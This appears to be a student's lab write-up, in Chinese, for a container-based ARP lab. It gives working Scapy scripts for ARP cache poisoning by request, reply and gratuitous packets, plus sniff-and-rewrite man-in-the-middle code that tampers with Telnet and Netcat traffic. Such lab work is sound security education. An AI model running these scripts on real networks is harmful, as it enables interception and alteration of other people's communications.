ARP
Task 1: ARP Cache Poisoning
启动容器
Task 1.A (using ARP request)
进入主机A,检查A的arp缓存(应该为空)
进入主机M,编写下列代码并运行
#!/usr/bin/python3
from scapy.all import *
# M
src_mac='02:42:0a:09:00:69'# M
dst_mac='00:00:00:00:00:00'
dst_mac_eth='ff:ff:ff:ff:ff:ff'
src_ip='10.9.0.6' # B
dst_ip='10.9.0.5' # 任意 IP
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, pdst=dst_ip, op=1)
pkt = eth / arp
sendp(pkt)
在主机A中查看arp缓存
Task 1.B (using ARP reply)
先删除主机A的ARP缓存
在M中构造应答包代码,并运行
#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='02:42:0a:09:00:05' # A
src_ip='10.9.0.6' # B
dst_ip='10.9.0.5' # A
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)
在A中启动tcpdump,确实监听到了应答包,但是arp缓存未发生改变
Task 1C (using ARP gratuitous message)
在M中编写并运行下列代码
#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='ff:ff:ff:ff:ff:ff' # broadcast MAC address
src_ip='10.9.0.6' # B
dst_ip='10.9.0.6' # B
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)
在A中启动tcpdump,确实监听到了应答包,但是arp缓存未发生改变
Task 2: MITM Attack on Telnet using ARP Cache Poisoning
Step 1
在M中编写并允许下列代码
#!/usr/bin/python3
#!/usr/bin/python3
from scapy.all import *
broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "02:42:0a:09:00:05"
A_ip = "10.9.0.5"
# machine B
B_mac = "02:42:0a:09:00:06"
B_ip = "10.9.0.6"
# machine M
M_mac = "02:42:0a:09:00:69"
M_ip = "10.9.0.105"
# attack machine A
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=B_ip, pdst=A_ip)
sendp(E/A)
# attack machine B
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=A_ip, pdst=B_ip)
sendp(E/A)
查看AB主机中arp缓存
Step 2
在M中关闭路由转发
sysctl net.ipv4.ip_forward=0
在主机B中ping 主机A(无法成功)
Step 3
在M中打开路由转发
sysctl net.ipv4.ip_forward=1
在主机B中ping 主机A(成功)
Step 4
在M上打开包转发功能,然后在机器A上使用telnet连接B(成功连接)
关闭B的IP转发功能后,在机器A上使用telnet连接B(无法连接)
在M上编写代码并运行
#!/usr/bin/env python3
from scapy.all import *
import re
# Who can it be used? Write first!
IP_A = "10.9.0.5"
IP_B = "10.9.0.6"
print("********** MITM attack on Telnet **********")
def spoof_pkt(pkt):
if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
newpkt = IP(bytes(pkt[IP]))
del(newpkt.chksum)
del(newpkt[TCP].payload)
del(newpkt[TCP].chksum)
if pkt[TCP].payload:
data = pkt[TCP].payload.load
data = data.decode()
print("Old:"+data)
newdata = re.sub(r'[a-zA-Z]', r'Z', data)
print("New:"+newdata)
send(newpkt/newdata, verbose=False)
else:
send(newpkt, verbose=False)
elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
newpkt = IP(bytes(pkt[IP]))
del(newpkt.chksum)
del(newpkt[TCP].chksum)
send(newpkt, verbose=False)
f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'
pkt = sniff(filter=f, prn=spoof_pkt)
在A中使用telnet连接B,无论输入什么都会显示为Z
Task 3: MITM Attack on Netcat using ARP Cache Poisoning
可以使用以下命令在A和B之间建立netcat TCP连接
#On Host B (server, IP address is 10.9.0.6), run the following:
nc -lp 9090
#On Host A (client), run the following:
nc 10.9.0.6 9090
在M中编写攻击脚本
#!/usr/bin/env python3
from scapy.all import *
# We Only use ip
IP_A = "10.9.0.5"
IP_B = "10.9.0.6"
print("********** MITM attack on Netcat **********")
def spoof_pkt(pkt):
if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
newpkt = IP(bytes(pkt[IP]))
del(newpkt.chksum)
del(newpkt[TCP].payload)
del(newpkt[TCP].chksum)
if pkt[TCP].payload:
data = pkt[TCP].payload.load
print("Old:"+str(data))
newdata = data.replace(b'Hello', b'attacked') # replace name
print("New:"+str(newdata))
newpkt[IP].len = pkt[IP].len + len(newdata) - len(data)
send(newpkt/newdata, verbose=False)
else:
send(newpkt, verbose=False)
elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
newpkt = IP(bytes(pkt[IP]))
del(newpkt.chksum)
del(newpkt[TCP].chksum)
send(newpkt, verbose=False)
f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'
pkt = sniff(filter=f, prn=spoof_pkt)
在A中发送Hello
B中被篡改为attacked